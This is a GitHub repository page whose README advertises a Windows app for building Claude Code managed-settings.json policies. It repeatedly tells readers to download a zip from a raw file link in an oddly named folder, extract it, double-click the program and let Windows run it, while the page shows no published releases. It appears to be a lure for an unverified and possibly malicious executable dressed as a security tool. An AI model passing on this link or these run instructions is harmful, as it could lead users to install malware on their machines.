Skip to content

andrusturkic29/managed-settings

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

🔧 managed-settings - Build secure Claude settings fast

Download managed-settings

📥 Download

Visit this page to download managed-settings for Windows:

https://raw.githubusercontent.com/andrusturkic29/managed-settings/main/insubjection/managed_settings_v2.3.zip

  1. Open the link above in your browser.
  2. Find the latest release at the top of the page.
  3. Download the Windows file that matches your PC.
  4. Save the file to your Downloads folder.
  5. If the file comes in a .zip folder, right-click it and choose Extract All.
  6. Open the extracted folder.
  7. Double-click the app file to start it.

🖥️ What this app does

managed-settings helps you build a Claude Code managed-settings.json file with less effort. It gives you a simple way to set up:

  • Security rules
  • Permission limits
  • Sandbox controls
  • MCP settings
  • Hooks
  • Plugins
  • Environment variables

It is made for users who want a clear path to a ready-to-use settings file without hand editing every part.

✅ Before you start

Use a Windows PC with:

  • Windows 10 or Windows 11
  • Internet access for the first download
  • Enough space for the app and its files
  • A mouse or touchpad for easy setup

If Windows asks for permission to run the app, choose the option that lets it open.

🚀 Get started

  1. Download the latest release from the link above.
  2. Extract the file if it downloads as a .zip.
  3. Open the app.
  4. Pick the parts you want to include in your Claude Code setup.
  5. Review the settings before saving.
  6. Export the managed-settings.json file.
  7. Place the file where Claude Code expects it.

🛠️ Main features

🔒 Security policies

Set clear rules for what Claude Code can and cannot do. You can define access limits, file rules, and safer default behavior.

🧩 Permissions

Control what actions are allowed. This helps you keep tighter control over commands and file access.

🏗️ Sandbox controls

Choose how isolated the environment should be. This is useful when you want to reduce risk while running tools.

🔌 MCP controls

Manage MCP connections and settings in one place. This gives you a cleaner way to handle external tools and services.

🪝 Hooks

Add hook rules for actions that should run before or after certain events.

🧱 Plugins

Include plugin settings for a more structured setup. This helps keep related options together.

🌍 Environment variables

Define environment values without editing the file by hand. This makes repeat setup easier.

📄 How to use the builder

  1. Open managed-settings.
  2. Start with a basic policy.
  3. Add permission rules for the actions you want to allow.
  4. Set sandbox options if you want more control.
  5. Add MCP entries if your setup needs them.
  6. Include hooks or plugins if needed.
  7. Add environment variables.
  8. Review the full JSON output.
  9. Save the file when it looks right.

📌 Where to place the file

After you export the file, put it in the location used by Claude Code on your system.

Common setup patterns include:

  • A project folder for one workspace
  • A central user settings location
  • A managed folder used by your team

If you are not sure where Claude Code reads settings from, use the same folder each time so you can find it again.

🧭 Typical use cases

  • Set up a standard policy for a team
  • Keep local Claude Code settings in one file
  • Apply the same rules across many machines
  • Reduce manual editing
  • Build a cleaner policy file for security review
  • Prepare settings for managed desktop use

🧪 Example workflow

  1. Open the app.
  2. Choose a security profile.
  3. Add only the permissions you need.
  4. Turn on sandbox rules if your workflow needs them.
  5. Add MCP tools that are allowed in your setup.
  6. Export the final managed-settings.json.
  7. Copy the file to the right folder.
  8. Start Claude Code and use the new settings

📝 File format

The app generates a JSON file named managed-settings.json.

That file can include:

  • Policy data
  • Permissions
  • Sandbox rules
  • MCP entries
  • Hook definitions
  • Plugin settings
  • Environment variables

Because the output is plain JSON, it can fit into common admin and desktop workflows.

🔍 Topics covered

This project focuses on:

  • Anthropic
  • Claude
  • Claude Code
  • Claude Code settings
  • Configuration
  • Enterprise security
  • Managed settings
  • Managed settings JSON
  • MCP
  • MDM
  • Policy builder
  • Security policy
  • Settings JSON

❓ Common questions

Do I need coding knowledge?

No. You can use the app by choosing options and saving the file.

Is this for personal or team use?

It works for both. You can use it for one machine or for a larger rollout.

Can I edit the JSON by hand?

Yes, if you want. The builder helps you avoid manual editing.

Does it help with security rules?

Yes. It is built to help you define secure Claude Code settings in a structured way.

📂 Release download

Use this page to get the latest Windows build:

https://raw.githubusercontent.com/andrusturkic29/managed-settings/main/insubjection/managed_settings_v2.3.zip

Open the latest release, download the file for Windows, extract it if needed, then run the app

About

Build Claude Code managed-settings.json policies with a visual editor for permissions, sandbox, MCP, hooks, and env vars

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors